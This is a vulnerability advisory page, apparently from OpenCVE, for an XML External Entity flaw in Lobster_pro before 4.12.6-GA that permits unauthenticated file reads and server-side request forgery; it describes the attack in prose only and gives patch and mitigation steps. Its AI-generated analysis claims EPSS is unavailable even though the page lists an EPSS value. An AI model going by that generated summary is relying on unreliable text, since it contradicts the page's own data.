Description
Unauthenticated attackers can exploit a weakness in the XML parser functionality of Lobster_pro prior to version 4.12.6-GA. This allows them to obtain read access to files on the application server and adjacent network shares, and perform HTTP GET requests to arbitrary services.
Published: 2026-04-30
Score: 7.7 High
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

Unauthenticated attackers can exploit XML External Entity processing in Lobster_pro prior to version 4.12.6‑GA. This flaw permits read access to files on the application server and adjacent network shares and enables arbitrary HTTP GET requests to external services. The result is unauthorized disclosure of sensitive data and the potential for further outbound communication that may facilitate additional attacks.

Affected Systems

Lobster GmbH’s Lobster_pro is affected. All releases older than 4.12.6‑GA on Windows platforms are vulnerable and must be upgraded.

Risk and Exploitability

The CVSS score of 7.7 indicates high severity. EPSS is not available, so the probability of exploitation is unknown, and the vulnerability is not listed in CISA’s KEV catalog. The likely attack vector is an unauthenticated user submitting malicious XML to the application or an attacker with network access to the server. Successful exploitation can lead to confidential data disclosure and outbound traffic that may conceal further attacks.

Generated by OpenCVE AI on May 1, 2026 at 05:12 UTC.

Remediation

Vendor Solution

Update to Lobster_pro release 4.12.6-GA or higher.

OpenCVE Recommended Actions

  • Update Lobster_pro to release 4.12.6‑GA or newer.
  • If upgrading immediately is not possible, disable XML external entity support or use a secure XML parser that rejects external entities.
  • Restrict outbound HTTP traffic from the application server using firewall rules and monitor for unauthorized requests.

Generated by OpenCVE AI on May 1, 2026 at 05:12 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Fri, 01 May 2026 08:45:00 +0000

Type Values Removed Values Added
First Time appeared Lobster
Lobster lobster Pro
Vendors & Products Lobster
Lobster lobster Pro

Thu, 30 Apr 2026 14:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'yes', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Thu, 30 Apr 2026 13:00:00 +0000

Type Values Removed Values Added
Description Unauthenticated attackers can exploit a weakness in the XML parser functionality of Lobster_pro prior to version 4.12.6-GA. This allows them to obtain read access to files on the application server and adjacent network shares, and perform HTTP GET requests to arbitrary services.
Title Arbitrary File Read and Server Side Request Forgery via XML External Entities in Lobster_pro
First Time appeared Lobster Gmbh
Lobster Gmbh lobster Pro
Weaknesses CWE-611
CPEs cpe:2.3:a:lobster_gmbh:lobster_pro:*:*:windows:*:*:*:*:*
cpe:2.3:a:lobster_gmbh:lobster_pro:4.12.6-ga:*:windows:*:*:*:*:*
Vendors & Products Lobster Gmbh
Lobster Gmbh lobster Pro
References
Metrics cvssV4_0

{'score': 7.7, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:H/SI:N/SA:N/S:N/AU:Y/V:C'}

Subscriptions

Lobster Lobster Pro
Lobster Gmbh Lobster Pro
cve-icon MITRE

Status: PUBLISHED

Assigner: SCHUTZWERK

Published:

Updated: 2026-04-30T13:15:37.670Z

Reserved: 2025-07-03T09:19:50.254Z

Link: CVE-2024-13971

cve-icon Vulnrichment

Updated: 2026-04-30T13:15:33.919Z

cve-icon NVD

Status : Awaiting Analysis

Published: 2026-04-30T13:16:02.680

Modified: 2026-04-30T15:48:26.580

Link: CVE-2024-13971

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-05-01T08:21:25Z

Weaknesses